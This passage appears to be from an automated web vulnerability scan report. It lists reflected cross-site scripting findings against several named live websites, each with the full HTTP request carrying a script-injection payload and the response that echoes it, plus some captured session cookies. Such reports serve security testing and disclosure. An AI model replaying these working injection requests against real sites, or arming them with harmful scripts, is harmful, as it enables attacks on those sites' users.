Set-Cookie: PHPSESSID=184erm2kcqjgd8l1dqllt4pas5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648528; expires=Sat, 21-Jan-2012 22:22:08 GMT; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91404

<script>
function ValidatorTrim_video(s)
{
var m = s.match(/^\s*(\S+(\s+\S+)*)\s*$/);
return (m == null) ? "" : m[1];
}

function checkEmail_video(strng)
{
var error = "";
if (strng == "")

...[SNIP]...
<form name='mrt_sub_form' id='mrt_sub_form' method='POST' action='http://www.aharrisonbarnes.com/index.php?69719\'><script>alert(1)</script>1fd47fb9727=1'>
...[SNIP]...

3.10. http://www.architecturecrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.architecturecrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65f46"><script>alert(1)</script>4362759dd83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?65f46"><script>alert(1)</script>4362759dd83=1 HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:00 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t0mrcek43plfm1nbkvfa8s5475; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:00 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125437

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.architecturecrossing.com/?65f46"><script>alert(1)</script>4362759dd83=1">
...[SNIP]...

3.11. http://www.auditorcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.auditorcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ed6"><script>alert(1)</script>7d1d61e5318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d4ed6"><script>alert(1)</script>7d1d61e5318=1 HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:00 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ifgrkcdgfg30p4jfql24nnum63; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:00 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125557

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.auditorcrossing.com/?d4ed6"><script>alert(1)</script>7d1d61e5318=1">
...[SNIP]...

3.12. http://www.automotivecrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.automotivecrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d55b"><script>alert(1)</script>709fa56540f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3d55b"><script>alert(1)</script>709fa56540f=1 HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=00ecl9mekiv0j9dgolrk0k94n0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109200

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.automotivecrossing.com/?3d55b"><script>alert(1)</script>709fa56540f=1">
...[SNIP]...

3.13. http://www.aviationcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aviationcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2428f"><script>alert(1)</script>7d6abdc0dd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2428f"><script>alert(1)</script>7d6abdc0dd3=1 HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:10 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=lkn6lmhpp9f0snqdnfsosfppg4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123255

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.aviationcrossing.com/?2428f"><script>alert(1)</script>7d6abdc0dd3=1">
...[SNIP]...

3.14. http://www.bcgsearch.com/searchresults.php [key parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bcgsearch.com
Path:	/searchresults.php

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 652f4"><a>5cf13bb15d1 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /searchresults.php?key=OP3V61427652f4"><a>5cf13bb15d1 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=a892eukh7ovae4jmcsqhkevdk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68788

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<link rel="canonical" href="http://www.bcgsearch.com/searchresults.php?key=OP3V61427652f4"><a>5cf13bb15d1" />
...[SNIP]...

3.15. http://www.bcgsearch.com/searchresults.php [key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bcgsearch.com
Path:	/searchresults.php

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72118"><script>alert(1)</script>118f3550af9 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.php?key=OP3V6142772118"><script>alert(1)</script>118f3550af9 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 20:01:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=rmpahjvejlm5e0t1hefelupr22; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68942

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<link rel="canonical" href="http://www.bcgsearch.com/searchresults.php?key=OP3V6142772118"><script>alert(1)</script>118f3550af9" />
...[SNIP]...

3.16. http://www.bcgsearch.com/searchresults.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bcgsearch.com
Path:	/searchresults.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b4b"><script>alert(1)</script>65ee7e46726 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.php?c5b4b"><script>alert(1)</script>65ee7e46726=1 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=oe75j7p7vu4b8kk2unodlqkfe7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68865

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<link rel="canonical" href="http://www.bcgsearch.com/searchresults.php?c5b4b"><script>alert(1)</script>65ee7e46726=1" />
...[SNIP]...

3.17. http://www.bilingualcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bilingualcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70508"><script>alert(1)</script>8ee9c52dde1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?70508"><script>alert(1)</script>8ee9c52dde1=1 HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=no661p4827foa2ncnmfljmp3l0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133156

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.bilingualcrossing.com/?70508"><script>alert(1)</script>8ee9c52dde1=1">
...[SNIP]...

3.18. http://www.biotechcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.biotechcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d14"><script>alert(1)</script>e5a2e9ead51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?10d14"><script>alert(1)</script>e5a2e9ead51=1 HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rugpvnfefu0ijcftjlrvftr4p6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119759

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.biotechcrossing.com/?10d14"><script>alert(1)</script>e5a2e9ead51=1">
...[SNIP]...

3.19. http://www.bluecollarcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bluecollarcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b61"><script>alert(1)</script>5c6959b8b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a6b61"><script>alert(1)</script>5c6959b8b1b=1 HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:47 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6aoaisevp9dgsf3glk0u3kfmh2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149457

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.bluecollarcrossing.com/?a6b61"><script>alert(1)</script>5c6959b8b1b=1">
...[SNIP]...

3.20. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8ef'-alert(1)-'df58b41138a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Secured/Content9d8ef'-alert(1)-'df58b41138a/Forms/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:52:57 GMT
Content-Length: 855
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:12:57 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...
<![CDATA[
